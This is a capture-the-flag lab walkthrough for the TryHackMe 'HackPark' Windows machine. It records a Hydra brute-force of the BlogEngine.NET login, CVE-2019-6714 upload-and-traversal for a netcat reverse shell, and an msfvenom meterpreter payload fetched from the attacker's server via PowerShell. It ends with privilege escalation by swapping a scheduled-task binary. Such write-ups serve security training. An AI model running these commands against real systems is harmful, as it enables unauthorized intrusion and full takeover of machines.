
THM - HackPark

Deploy the vulnerable Windows machine

  • pennywise (the clown pictured on the homepage)

Using Hydra to brute-force a login

Find the login page first:

gobuster dir --url http://10.10.117.53 -w directory-list-1.0.txt

http://10.10.117.53/admin (redirects to /Account/login.aspx?ReturnURL=/admin)

A first, naive attempt that guesses the field names does not work. The login page is an ASP.NET WebForms form: the real field names are the full control IDs, and the POST must also carry the hidden __VIEWSTATE and __EVENTVALIDATION values, otherwise the request is rejected before the credentials are ever checked:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx:login=^USER^&password=^PASS^:F=failed"

Capture one real login POST (Burp or the browser's developer tools), copy the hidden fields and the control names into the form string, and use the page's "Login failed" message as the failure condition (F=failed):

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=bbKmJ9xxHdEFSouZb%2FJt114g7kbCU%2BaAQwAIi4deqUFdDc2%2BDOyfhbxPK%2B%2BNIs0jqf%2FsVfEDjsUlyqNHfV9qvtxjqKI%2Bxk0hB92SHyd%2FrMv8lSkz39MnOgI%2FZTUf8MkHtfySJo6nuN%2BfIreenhyC74kh2wscnkRKMUtwStKAYClr9zwW&__EVENTVALIDATION=HBnWUtjmHn9931oNnDtG22SHpD0NpHECaRk84HSrl2D8YcWVS9rjv5ZaHkUBaawrBI4SEK67XCSEm4PrceIrvncRurdqS7hnGAOprTQOqVT%2BCYiaQQdwX5Btmf1e3LIh%2BEAFsXzTN5jJFUTpssnZJ6jYywchAMPdrLGCkPjibCwERDvH&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=failed"

Compromise the machine

Admin login

Hydra finds the credentials: login admin, password 1qaz2wsx

CMS Version

BlogEngine.NET 3.3.6.0 (shown in the admin dashboard)

Exploit for that version

CVE-2019-6714, BlogEngine.NET 3.3.6 directory traversal / remote code execution via the theme parameter: https://www.exploit-db.com/exploits/46353

Place where exploit can be uploaded

10.10.117.53/admin/app/editor/editpost.cshtml (the post editor's file manager). Set the attacker IP and listener port inside the exploit, save it as PostView.ascx, and upload it there; it lands in App_Data/files.

Set up listener

nc -nvlp 4443

Trigger the reverse shell

The traversal in the theme parameter makes BlogEngine load the uploaded PostView.ascx from App_Data/files instead of the real theme, which runs the payload:

10.10.117.53/?theme=../../App_Data/files/

Get the shell

whoami (the netcat listener receives a shell as the low-privileged IIS application-pool account, so privilege escalation is needed)

Windows Privilege Escalation

Generate payload with better shell

attacker machine

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe

Expose shell.exe by local server

attacker machine (serves the current directory on port 8000; winPEAS.bat is fetched from the same place later, so put it here too)

python3 -m http.server

Run listener

msfconsole
msf6 > search multi handler
...
5   exploit/multi/handler
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

(The index in the search output varies between installs; "use exploit/multi/handler" selects the module regardless. LPORT and PAYLOAD must match what msfvenom was given.)

Get shell.exe

target machine

powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

target machine (in the netcat shell; running shell.exe hands the handler a meterpreter session)

cd C:\Windows\Temp
dir
.\shell.exe

target machine (from the meterpreter session, "shell" drops into cmd; fetch and run winPEAS for privilege-escalation enumeration)

shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat

target machine

winPEAS points at the SystemScheduler service installed in C:\Program Files (x86)\SystemScheduler. Its Events log shows Message.exe being launched by the scheduler every ~30 seconds under the Administrator account, and the directory is writable by our user, so swapping Message.exe for shell.exe gets our payload executed with Administrator privileges on the next run. Keep a backup of the original binary:

meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"

Then close this session and start the handler again so it catches the callback from the scheduled run (shell.exe still connects back to 10.18.9.175:4442):

meterpreter > exit
msf6 exploit(multi/handler) > run

Within a minute the handler should receive a new session running as Administrator, i.e. an elevated shell on Windows rather than a "root" shell. Confirm with getuid (or whoami from a shell).